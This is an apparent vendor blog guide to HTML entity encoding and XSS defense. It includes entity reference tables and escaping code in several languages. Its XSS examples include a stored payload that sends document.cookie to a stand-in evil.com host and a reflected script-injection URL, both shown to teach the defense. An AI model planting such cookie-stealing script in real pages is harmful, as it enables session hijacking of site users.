HTML Encoder Guide: XSS Prevention & Entity Character Reference

Published April 10, 2026 · ~12 min read · By RiseTop Security Team

HTML Entity Encoding is one of the most fundamental and important defenses in web security. By converting special HTML characters into entity references, it prevents browsers from misinterpreting those characters as HTML tags or JavaScript code, effectively protecting against XSS (Cross-Site Scripting) attacks.

This guide covers HTML encoding principles, entity character references, XSS prevention strategies, and how to correctly use HTML encoding in different contexts.

🛡️ Need to encode/decode HTML entities quickly? Use the RiseTop HTML Encoder/Decoder to convert special characters to safe HTML entities in one click.

1. What Is HTML Encoding?

HTML documents use angle brackets < and > to define tags. When content itself contains these characters, failing to process them causes the browser to mistake them for HTML tags, leading to rendering errors or worse—security vulnerabilities.

HTML encoding represents these special characters through entity references. There are three formats for HTML entities:

Named entities: &amp;, &lt;, &gt;, etc. (using predefined names)
Decimal entities: &#38;, &#60;, &#62;, etc. (using Unicode code points)
Hexadecimal entities: &#x26;, &#x3C;, &#x3E;, etc.

For example, to display the text <script>alert('XSS')</script> on a webpage instead of executing it, you need to encode it as:

&lt;script&gt;alert('XSS')&lt;/script&gt;
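
The two numeric formats can be derived mechanically from a character's Unicode code point. The following is a minimal sketch; toDecimalEntity and toHexEntity are hypothetical helper names chosen for illustration, not built-in or library functions.

```javascript
// Hypothetical helpers: build numeric character references
// from the first code point of the given string.
function toDecimalEntity(ch) {
  return '&#' + ch.codePointAt(0) + ';';
}

function toHexEntity(ch) {
  return '&#x' + ch.codePointAt(0).toString(16).toUpperCase() + ';';
}

console.log(toDecimalEntity('<')); // &#60;
console.log(toHexEntity('<'));     // &#x3C;
console.log(toDecimalEntity('&')); // &#38;
console.log(toHexEntity('©'));     // &#xA9;
```

Named entities cannot be computed this way; they come from a fixed list of predefined names.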

2. Five Core Characters That Must Be Encoded

Five characters in HTML have special meaning and must be encoded in any HTML context:

Character	Description	Named Entity	Decimal	Hex
&	Ampersand (entity start marker)	`&amp;`	&#38;	&#x26;
<	Less than (tag start)	`&lt;`	&#60;	&#x3C;
>	Greater than (tag end)	`&gt;`	&#62;	&#x3E;
"	Double quote (attribute value)	`&quot;`	&#34;	&#x22;
'	Single quote (attribute value)	`&apos;`	&#39;	&#x27;

💡 Important note: &apos; is not defined in HTML4 but is valid in HTML5 and XML. For maximum compatibility, use &#39; instead in HTML attributes.

3. HTML Entity Character Reference Table

3.1 Common Punctuation Symbols

Character	Description	HTML Entity
©	Copyright symbol	`&copy;`
®	Registered trademark	`&reg;`
™	Trademark	`&trade;`
€	Euro	`&euro;`
£	Pound sterling	`&pound;`
¥	Yen/Chinese yuan	`&yen;`
§	Section sign	`&sect;`
¶	Pilcrow (paragraph)	`&para;`
•	Bullet	`&bull;`
…	Ellipsis	`&hellip;`
–	En dash	`&ndash;`
—	Em dash	`&mdash;`

3.2 Common Math & Science Symbols

Character	Description	HTML Entity
±	Plus-minus sign	`&plusmn;`
×	Multiplication sign	`&times;`
÷	Division sign	`&divide;`
≠	Not equal to	`&ne;`
≤	Less than or equal to	`&le;`
≥	Greater than or equal to	`&ge;`
∞	Infinity	`&infin;`
←	Left arrow	`&larr;`
→	Right arrow	`&rarr;`
⇐	Double left arrow	`&lArr;`
⇒	Double right arrow	`&rArr;`

3.3 Common Typography & Spaces

Description	HTML Entity	Notes
Non-breaking space	`&nbsp;`	Most commonly used space entity
Thin space	`&thinsp;`	Narrower than a regular space
En space	`&ensp;`	Equal to half the font size
Em space	`&emsp;`	Equal to the font size
Zero-width space	`&#8203;`	Invisible, allows line breaks
Zero-width non-joiner	`&zwnj;`	Prevents ligatures
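
When a page cannot rely on its character encoding being declared correctly, symbols like those in the tables above can be emitted as numeric references instead of raw characters. The following is a rough sketch; encodeNonAscii is a hypothetical name. It leaves ASCII untouched, so it does not replace escaping of &, <, > and quotes.

```javascript
// Hypothetical helper: replace every non-ASCII code point with a
// decimal character reference. ASCII characters pass through unchanged.
function encodeNonAscii(str) {
  let out = '';
  // for...of iterates by code point, so surrogate pairs stay together.
  for (const ch of str) {
    const cp = ch.codePointAt(0);
    out += cp > 127 ? '&#' + cp + ';' : ch;
  }
  return out;
}

console.log(encodeNonAscii('5 € ± 1')); // 5 &#8364; &#177; 1
```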

4. XSS Attacks & HTML Encoding Defense

4.1 What Is XSS?

XSS (Cross-Site Scripting) is one of the most common web application security vulnerabilities. Attackers inject malicious JavaScript into webpages, and the scripts execute when other users visit the affected page.

4.2 Three Types of XSS

1. Stored XSS

Malicious scripts are permanently stored on the target server (e.g., in a database or comment system). When users visit pages containing the malicious content, the script executes automatically. This is the most dangerous type of XSS.

<!-- Content submitted by an attacker in the comments section -->
<script>fetch('https://evil.com/steal?cookie='+document.cookie)</script>

2. Reflected XSS

Malicious scripts are included in URL parameters, and the server "reflects" them back in the response page. The attacker must trick users into clicking a malicious link.

<!-- URL: https://example.com/search?q=<script>alert(1)</script> -->
<!-- Server returns unencoded content: -->
<p>Search results: <script>alert(1)</script></p>
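
The reflected case above goes away once the server encodes the parameter before writing it into the page. The following is a minimal sketch; renderSearchResults is a hypothetical stand-in for whatever template or handler builds the response.

```javascript
// Encode the five characters with special meaning in HTML.
function escapeHtml(str) {
  return String(str)
    .replace(/&/g, '&amp;')
    .replace(/</g, '&lt;')
    .replace(/>/g, '&gt;')
    .replace(/"/g, '&quot;')
    .replace(/'/g, '&#39;');
}

// Hypothetical renderer for the search page in the example above.
function renderSearchResults(query) {
  return '<p>Search results: ' + escapeHtml(query) + '</p>';
}

console.log(renderSearchResults('<script>alert(1)</script>'));
// <p>Search results: &lt;script&gt;alert(1)&lt;/script&gt;</p>
```

The browser now displays the payload as text instead of parsing it as a script element.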

3. DOM-based XSS

The vulnerability exists entirely on the client side—JavaScript directly inserts untrusted data into the DOM without encoding.

// ❌ Dangerous: directly inserting HTML
document.getElementById('output').innerHTML = userInput;

// ✅ Safe: using textContent
document.getElementById('output').textContent = userInput;

4.3 How HTML Encoding Defends Against XSS

HTML encoding is the core defense against XSS, but you must pay attention to the context. Different HTML contexts require different encoding strategies:

Context	Characters to Encode	Encoding Method
HTML content (inside elements)	& < >	HTML entity encoding
HTML attribute (double-quoted)	& < > "	HTML entity encoding
HTML attribute (single-quoted)	& < > '	HTML entity encoding
URL attribute (href, src)	URL-reserved characters, then & < > " '	URL-encode the untrusted part, then HTML-encode the attribute value
JavaScript inline	Requires stricter encoding	Avoid; use frameworks instead
CSS inline	Special characters	Avoid
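
To make the attribute rows concrete, here is a small sketch of the two attribute contexts. The function names and the /search URL are assumptions made for illustration. For the URL case, it percent-encodes the untrusted component and then HTML-encodes the finished attribute value, because the browser decodes HTML entities before it interprets the URL.

```javascript
function escapeHtml(str) {
  return String(str)
    .replace(/&/g, '&amp;')
    .replace(/</g, '&lt;')
    .replace(/>/g, '&gt;')
    .replace(/"/g, '&quot;')
    .replace(/'/g, '&#39;');
}

// Attribute context: always quote the attribute and encode the value.
function renderInput(value) {
  return '<input type="text" value="' + escapeHtml(value) + '">';
}

// URL attribute context: percent-encode the untrusted component first,
// then HTML-encode the whole URL for the attribute.
function renderSearchLink(term) {
  const url = '/search?q=' + encodeURIComponent(term) + '&page=1';
  return '<a href="' + escapeHtml(url) + '">Search again</a>';
}

console.log(renderInput('" onmouseover="alert(1)'));
// <input type="text" value="&quot; onmouseover=&quot;alert(1)">
console.log(renderSearchLink('a&b <c>'));
// <a href="/search?q=a%26b%20%3Cc%3E&amp;page=1">Search again</a>
```

This sketch covers only untrusted data placed inside a URL. A URL supplied entirely by the user would also need its scheme checked, which encoding alone does not do.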

4.4 Auto-Encoding in Modern Frameworks

Modern front-end frameworks encode output by default, greatly reducing XSS risk:

React: {} expressions in JSX automatically HTML-encode. Only dangerouslySetInnerHTML skips encoding.
Vue: {{ }} interpolation auto-encodes HTML. Use v-html with extra caution.
Angular: Template bindings encode HTML by default.

⚠️ Anti-pattern: Directly using innerHTML, document.write(), dangerouslySetInnerHTML, or v-html to insert user input is one of the most common sources of XSS vulnerabilities. If you must use them, always HTML-encode untrusted content first.
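
The idea behind framework auto-encoding can be approximated in plain JavaScript with a tagged template. This is only an illustrative sketch, not how React, Vue, or Angular are implemented, and safeHtml is a hypothetical name. Literal parts of the template are treated as trusted markup, and every interpolated value is encoded.

```javascript
function escapeHtml(value) {
  return String(value)
    .replace(/&/g, '&amp;')
    .replace(/</g, '&lt;')
    .replace(/>/g, '&gt;')
    .replace(/"/g, '&quot;')
    .replace(/'/g, '&#39;');
}

// Hypothetical tagged template: static strings pass through,
// interpolated values are always HTML-encoded.
function safeHtml(strings, ...values) {
  let out = strings[0];
  values.forEach((value, i) => {
    out += escapeHtml(value) + strings[i + 1];
  });
  return out;
}

const userInput = '<img src=x onerror=alert(1)>';
console.log(safeHtml`<p>Hello, ${userInput}!</p>`);
// <p>Hello, &lt;img src=x onerror=alert(1)&gt;!</p>
```

A string built this way can be assigned to innerHTML with less risk, provided the interpolations land only in element content or quoted attribute values.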

5. HTML Encoding in Different Languages

// JavaScript
function escapeHtml(str) {
  return str
    .replace(/&/g, '&amp;')
    .replace(/</g, '&lt;')
    .replace(/>/g, '&gt;')
    .replace(/"/g, '&quot;')
    .replace(/'/g, '&#39;');
}

# Python
import html
safe = html.escape(user_input, quote=True)

// PHP
$safe = htmlspecialchars($user_input, ENT_QUOTES, 'UTF-8');

// Java
import org.apache.commons.text.StringEscapeUtils;
String safe = StringEscapeUtils.escapeHtml4(userInput);

// Go
import "html"
safe := html.EscapeString(userInput)
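
In a hand-written chained escaper, the order of the replacements matters: the ampersand has to be handled first, otherwise the & in entities produced by earlier steps gets encoded again. The sketch below shows the failure next to a single-pass variant that avoids the ordering question. Both function names and the HTML_ESCAPES map are hypothetical.

```javascript
// Lookup table for the five core characters.
const HTML_ESCAPES = {
  '&': '&amp;',
  '<': '&lt;',
  '>': '&gt;',
  '"': '&quot;',
  "'": '&#39;',
};

// Single pass: each character is visited once, so order cannot go wrong.
function escapeHtmlOnce(str) {
  return String(str).replace(/[&<>"']/g, (ch) => HTML_ESCAPES[ch]);
}

// Counter-example: replacing & last re-encodes the entity created for <.
function escapeWrongOrder(str) {
  return String(str).replace(/</g, '&lt;').replace(/&/g, '&amp;');
}

console.log(escapeHtmlOnce('a < b & c'));   // a &lt; b &amp; c
console.log(escapeWrongOrder('a < b & c')); // a &amp;lt; b &amp; c
```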

6. HTML Encoding vs URL Encoding vs JavaScript Encoding

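These encodings are often confused, but they serve completely different purposes. Base64 is included for comparison only: it converts binary data to text and provides no protection against injection.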

Encoding Type	Format Example	Use Case
HTML encoding	&lt; &gt; &amp;	Special characters in HTML documents
URL encoding	%3C %3E %26	Special characters in URLs
JS encoding	\u003C \u003E	Special characters in JavaScript strings
Base64 encoding	PGh0bWw+	Binary data to text

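Key principle: Apply the encoding that the target context requires, and no others. Don't stack URL encoding and HTML encoding on data that ends up in only one of those contexts. Each encoding corresponds to a specific parsing rule, so a mismatch causes display errors such as a literal &amp;lt; on the page, or leaves the data unescaped for the parser that actually reads it. When contexts are nested, as with a URL inside an HTML attribute, encode for the inner context first and the outer one last.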
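
Running one input through each encoding makes the difference visible. This is a sketch only: the variable names are arbitrary, the JS encoding shown covers just three characters, and btoa is assumed to be available as a global (browsers and recent Node.js versions).

```javascript
const input = '<a&b>';

// HTML encoding: for text placed in an HTML document.
const htmlEncoded = input
  .replace(/&/g, '&amp;')
  .replace(/</g, '&lt;')
  .replace(/>/g, '&gt;');

// URL encoding: for a value placed in a URL component.
const urlEncoded = encodeURIComponent(input);

// JS encoding: \uXXXX escapes for a value placed in a JavaScript string.
const jsEncoded = input.replace(/[<>&]/g, (ch) =>
  '\\u' + ch.charCodeAt(0).toString(16).toUpperCase().padStart(4, '0'));

// Base64: a transport encoding, shown for comparison only.
const base64Encoded = btoa(input);

console.log(htmlEncoded);   // &lt;a&amp;b&gt;
console.log(urlEncoded);    // %3Ca%26b%3E
console.log(jsEncoded);     // \u003Ca\u0026b\u003E
console.log(base64Encoded); // PGEmYj4=
```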

Summary

HTML encoding is the cornerstone of web security. Master these key points to effectively defend against the vast majority of XSS attacks:

Never trust user input—always encode output
Choose the correct encoding strategy for different HTML contexts
Prefer the auto-encoding features of modern front-end frameworks
Avoid unsafe APIs like innerHTML and dangerouslySetInnerHTML
Combine with CSP (Content Security Policy) for defense in depth

⚡ Quickly encode HTML special characters: RiseTop HTML Encoder/Decoder — supports both named entity and numeric entity output formats.

FAQ

What is the difference between HTML encoding and URL encoding?

HTML encoding uses entities starting with & and ending with ; (like &lt; &gt;) to safely display special characters in HTML documents. URL encoding uses percent prefixes (like %3C %3E) to transmit special characters in URLs. They serve different protocols and use cases, so don't mix them.

What is an XSS attack?

XSS (Cross-Site Scripting) is when an attacker injects malicious scripts into a webpage that execute when other users visit the page. The most common method is injecting JavaScript through unescaped user input in HTML. HTML encoding is the first line of defense against XSS.

What's the difference between &nbsp; and a regular space?

&nbsp; (non-breaking space) differs from a regular space in three ways: 1) browsers won't line-break at &nbsp;; 2) consecutive &nbsp; characters aren't collapsed into one (regular spaces are); 3) &nbsp; always takes up the width of a space in layout, even at the start or end of a line, where regular spaces are dropped.

Do I still need to manually HTML-encode in React/Vue?

In most cases, no. React's JSX {} and Vue's {{ }} interpolation automatically HTML-encode output. However, when using dangerouslySetInnerHTML (React) or v-html (Vue), you must manually HTML-encode the content.
